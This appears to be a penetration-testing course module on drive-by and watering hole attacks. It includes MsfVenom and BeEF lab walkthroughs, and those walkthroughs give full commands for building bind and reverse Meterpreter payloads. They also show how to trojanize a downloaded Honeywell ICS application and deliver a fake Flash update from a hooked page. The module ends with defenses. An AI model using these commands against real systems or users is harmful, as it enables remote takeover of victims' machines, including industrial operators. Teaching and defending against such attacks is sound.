Drive-By Attacks

This module covers drive-by attacks, which target normal web browsing to access a user's device. Attackers use third-party websites, ad networks, or typo-squatting phishing to deliver these attacks.

Drive-by attacks, also called client-side attacks, target weaknesses in a user's browser or software, not the server. Though a server may be part of the attack, the focus is on the user's device.

Drive-By Attack Operation

A drive-by attack works like this:

• The attacker hacks the website and adds harmful code to the content shown to users.

• The victim browses to the compromised website.

• The attacker sends code via a hacked site to gather details about the victim’s browser. If the browser is vulnerable, the attacker then sends an exploit to attack it.

• The victim's system links back to the attacker, giving the attacker access to the victim's machine.

This attack often works because it's effective. Vulnerable systems give attackers many chances to exploit them.

The Problem with Browsers

The main target for drive-by attacks is the browser, which is actually a large attack surface. Modern browsers handle many file types, support plugins, respond to web messages, and have features like HTML5 for video, audio, and local storage.

Attackers often breach systems through flaws in browser features. To do this, they first check if the browser has any vulnerabilities.

Watering Hole Attacks

A watering hole attack is like a drive-by attack but more targeted. Instead of attacking any vulnerable site, it focuses on a specific group, like a company or government, to exploit their weaknesses.

For example, if an attacker intends to disrupt industrial control systems, they might begin a watering hole attack by targeting the Control Automation website, a discussion forum for ICS engineers (https://control.com/). A quick look at the control.com site reveals that the site loads JavaScript, CSS, fonts, images, and ads from 13 different websites. Each of these websites is an attack opportunity for an adversary where, if compromised, the attacker can manipulate content sent to ICS administrators when they visit the control.com website.

Code-Executing Microsoft Office Files

Attackers often use malicious Microsoft Office files (.DOCM, .XLSM, etc.) from compromised websites. These files run harmful code when opened and show a security warning. Users might be cautious but could enable the macros because the files come from a trusted site. Attackers work hard to make these files seem safe.

Sample Watering Hole Attack Spreadsheet

The sample spreadsheet from control.com is for a Modbus offset calculator, a common ICS protocol tool. It also warns users that it contains macros.

Watering Hole Attack Spreadsheet, Annotated

An attacker tricks a user into enabling macros by offering a spreadsheet with useful features for ICS admins, like calculating Modbus register offsets. The file, named "Honeywell Siemens Modbus Offset Calc - UPDATED.xlsm," targets ICS admins with its specific name and appeals to users by seeming updated.

The spreadsheet is easy to understand and has an image of a familiar ICS device to seem more credible. It also notes that macros are needed to use the sheet. If the spreadsheet comes from a trusted site like control.com, the victim is more likely to enable macros, allowing the attacker to run harmful programs on their system and compromise it.

Conventional Exploit Delivery

Drive-by and watering hole attacks use exploits to attack browser and software vulnerabilities. These can target the browser itself, like recent Chrome vulnerabilities, or files associated with browsers, such as flaws in Microsoft Office documents. Attackers use any available exploit, whether new or old, to exploit vulnerabilities on the client device.

Fake Installers

An attacker can trick a victim by delivering a fake installer from a compromised trusted site. Users are more likely to trust and install this software because it appears to come from a trusted source. The fake installer keeps the original functions but includes malicious code. We'll explore how this works and the tools used.

Building Payloads – Metasploit MsfVenom

MsfVenom is a Metasploit tool that turns Metasploit payloads into standalone files, like EXE, JAR, or PowerShell scripts. It works on Windows, Linux, Android, and other UNIX systems, supporting different architectures like x86, ARM, and MIPS. It also offers options for obfuscation and encryption.

$ msfvenom -p windows/x64/shell_bind_tcp --platform windows -f psh-net -o bind_shell.ps1 LPORT=8888

When using Metasploit payloads, you set options like LPORT for listeners in the MsfVenom command line with OPTION=value. Let's check out a Lightning Labs event for more details.

1) MsfVenom is a Metasploit utility for generating attack payloads. Tools like the Metasploit console use payloads with an exploit, but MsfVenom takes payloads and generates standalone files.

Start by running the msfvenom command with the -h parameter to see the help output.

msfvenom -h

2) MsfVenom can generate output from any Metasploit payload. You can list the available payloads by running msfvenom -l payloads. Do that now, but be patient: it will take several seconds before you see the list of payloads.

msfvenom -l payloads

There are a lot of payloads to choose from. We can also configure the payload for a specific platform (Linux, Windows, Android, iOS, etc.)

3) Run msfvenom -l platforms to see a list of supported platforms.

msfvenom -l platforms

4) In addition to payloads and platforms, MsfVenom also lets us choose a format for the output file. Run msfvenom -l formats to see a list of supported formats.

msfvenom -l formats

5) Let's build a MsfVenom payload. In example, we'll build a TCP bind shell payload for 64-bit Windows systems, saving the output as an EXE file.

msfvenom -p windows/x64/shell_bind_tcp --platform windows -f exe -o bind_shell.exe

In the previous example we used several options to build the payload:

• The payload: -p windows/x64/shell/bind_tcp

• The platform: --platform windows

• The format: -f exe

• The output file -o bind_shell.exe

Some of the arguments MsfVenom can figure out automatically (such as the platform parameter for a Windows-only payload), but it doesn't hurt to be explicit

6) Using a very similar command, we can tell MsfVenom to build a DLL payload instead of an EXE: just change the -f option to dll and update the output file name to match. Do that now.

msfvenom -p windows/x64/shell_bind_tcp --platform windows -f dll -o bind_shell.dll

7) Another format option is to build a PowerShell payload. The psh-net format will take the Metasploit payload and generate a PowerShell script for execution on a system with .NET support.

Re-run the previous command, this time changing the payload type from dll to psh-net. Save the output file with a ps1 extension.

msfvenom -p windows/x64/shell_bind_tcp --platform windows -f psh-net -o bind_shell.ps1

8) Take a look at the PowerShell output from the previous command. MsfVenom generates the payload and the supporting PowerShell script code automatically.

cat bind_shell.ps1

9) These payloads are great, but they use default values (such as the listening port number). We can identify the available options by adding the --list-options argument. Add this argument to the previous bind shell payload command.

msfvenom -p windows/x64/shell_bind_tcp --platform windows -f psh-net -o bind_shell.ps1 --list-options

10) We can specify a payload option using NAME=VALUE on the command line. For example, generate the PowerShell payload for the bind shell, this time changing the LPORT option to 8888.

msfvenom -p windows/x64/shell_bind_tcp --platform windows -f psh-net -o bind_shell.ps1 LPORT=8888

11) Some payloads will require multiple options. Just specify the NAME=VALUE pair on the command line for each option.

For example, using the windows/x64/meterpreter/reverse_tcp on TCP port 443 for an attacker with the IP address 10.20.20.4 would require two parameters: LHOST and LPORT. Create a PowerShell payload with these two parameters as shown here.

msfvenom -p windows/x64/meterpreter/reverse_tcp --platform windows -f psh-net -o reverse_meterpreter.ps1 LHOST=10.20.20.4 LPORT=443

In this Lightning Labs event we looked at multiple options for using the MsfVenom utility to generate payloads with different options. Later in the course, we'll also investigate additional MsfVenom options for templates, custom parameters, and other payload types.

Browser Exploitation Framework (BeEF)

BeEF (Browser Exploitation Framework) by Wade Alcorn is a tool for attacking browsers. It exploits cross-site scripting (XSS) and can also be used for drive-by and watering hole attacks. One feature is social engineering attacks that trick users into running fake software updates. The victim must run a JavaScript file called a BeEF hook, which is delivered through a compromised website.

/opt/bin/beef

The BeEF framework is available at https://beefproject.com/.

BeEF Control Panel

The BeEF Control Panel, by default on TCP/3000, lets an attacker control victims. Here, a victim at 172.16.0.249 is registered after executing the BeEF hook. The attacker can select and send an attack, like a fake Flash update, to the victim by choosing it in the Commands tab and setting a malicious payload URL.

When the module runs, the victim gets a fake Flash Update message in their browser. They might think it's a real update and install malware. Clicking "install" or "remind me later" will send the attacker's payload. We'll see this in our lab. We’ve used BeEF to trick users before, but now let's learn how to create that payload.

MsfVenom Payload Template Feature

sec504@slingshot:~$ mkdir Smartline
sec504@slingshot:~$ cd Smartline/
sec504@slingshot:~/Smartline$ wget -q https://honeywellprocess.blob.core.windows.net/public/Support/vault/support/Public/Downloads/SmartLine-SMV-Modbus-Host-Application-V1.1.3.zip
sec504@slingshot:~/Smartline$ unzip -q SmartLine-SMV-Modbus-Host-Application-V1.1.3.zip
sec504@slingshot:~/Smartline$ msfvenom -p windows/meterpreter/reverse_tcp -f exe -a x86 --platform windows LHOST=10.10.75.1 LPORT=4444 -o tmp.exe -k -x 'SmartLine Modbus Manager.exe'
No encoder or badchars specified, outputting raw
payload
Payload size: 354 bytes
Final size of exe file: 1886720 bytes
Saved as: tmp.exe
sec504@slingshot:~/Smartline$ mv tmp.exe 'SmartLine Modbus Manager.exe'

MsfVenom's -x option lets you use a template executable and add a payload to it, keeping the original program's functions. The -k option makes it run both the original program and the payload at the same time.

We downloaded a Honeywell app for managing SmartLine Modbus ICS products. We used MsfVenom to create a malicious file, tmp.exe, by combining Meterpreter payload with the app. We replaced the original app with this malicious file and zipped it up. The final step is to distribute this malicious zip file to targets.

This command creates a malicious version of 'SmartLine Modbus Manager.exe' that, when run, will both execute the original application and establish a reverse TCP connection to the attacker's machine at 10.10.75.1:4444, allowing remote control via Meterpreter.

Drive-By Attack Defense

Defending against drive-by and watering hole attacks, especially zero-day attacks with no patches, can be tough. Key steps include using application allow lists to block untrusted programs and quickly applying patches to fix known vulnerabilities. Stay updated on attack trends and use threat intelligence feeds to customize alerts for new exploits relevant to your organization.

Log monitoring using tools like Splunk, Microsoft Sentinel, or Graylog helps track system activities. UEBA features in EDR and XDR tools analyze user behavior to spot unusual activities. For instance, if macros in Office documents are usually normal, but one starts PowerShell, UEBA will flag it as suspicious.

Drive-by and watering hole attacks are frequent threats to all kinds of organizations. Attackers use these methods to target both big and small companies, governments, and more. Use your knowledge of these attacks and suggested defenses to better protect your organization and reduce attack chances.

Lab 4.2: BeEF for Browser Exploitation

BeEF, the Browser Exploitation Framework, is a great tool for attacking a victim's browser and can be used to conduct client-side social engineering attacks that are very dicult for almost any user to detect.

In this lab exercise, we will use our Windows VM as the victim and the Slingshot Linux system as the attacker. The attacking system will start a Meterpreter reverse TCP handler listening on TCP port 4444 and a fake Flash update server listening on TCP port 8000. To gain remote access to the victim, the attacking platform will leverage a bot controller system for BeEF, listening on TCP port 3000.

We'll use Metasploit to make a Meterpreter payload as a Windows file. Then, we'll use Python to set up a web server on our Linux machine to host this file. Finally, we'll open a browser on Windows to download and run the payload from the Linux server.

Let's run the msfvenom tool to generate a Meterpreter reverse_tcp payload as a Windows EXE.

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=10.10.75.1 lport=4444 -f exe -o /tmp/FlashUpdate.exe

Next, lt's use python3 to start a HTTP web server listening on TCP port 8000.

python3 -m http.server

Next, let's open a new terminal, run msfconsole, and set up Metasploit to wait for a connection from the victim Windows VM. We'll use the exploit/multi/handler module and set the PAYLOAD to windows/meterpreter/reverse_tcp.

Let's open a new terminal and start BeEF by typing beef.

beef

Next, go back to our Windows system and visit the following URL: http://10.10.75.1:3000/demos/thetofuartist/index.html

On this page, we see tofu for sale, but it’s actually set up to mimic a hacked site. Though it looks normal, it’s secretly contacting the attacker’s BeEF server on our Slingshot VM regularly. Next, we’ll go to the Slingshot Linux VM to send harmful commands to this browser.

Let's go back to the Slingshot Linux VM, open the browser, and go to http://10.10.75.1:3000/ui/panel. This is BeEF's control panel, where we can make the victim's browser download our malicious file.

We will see 10.10.75.1 on the far left panel. Let's select the dropdown option for the 10.10.75.1 IP address. This will reveal the victim Windows system at 10.10.0.1.

In the BeEF Control Panel, let's click the Commands tab. Then, we'll open the Social Engineering group. Choose Fake Flash Update.

Let's hange the options in the far-right panel to match the ones below.

• Image: http://10.10.75.1:3000/adobe/flash_update.png

• Custom Payload URI: http://10.10.75.1:8000/FlashUpdate.exe

We’re showing BeEF where to find the image and malware for the user to download. After setting this up, click the Execute button at the bottom right.

Let's return to the Windows machine and wait for the fake Flash update box to appear. This might take some time because the page refreshes slowly and attacks aren't immediate. When the Flash update window shows up, click INSTALL.

Let's run the FlashUpdate.exe file, then return to the Slingshot Linux system.

This lab shows how easy it is to put malware on a website. Such attacks are used in drive-by and watering hole attacks, exploiting the trust between a website and its users. It highlights the importance of user training and app control. We'll also look at how attackers avoid detection systems later in the course.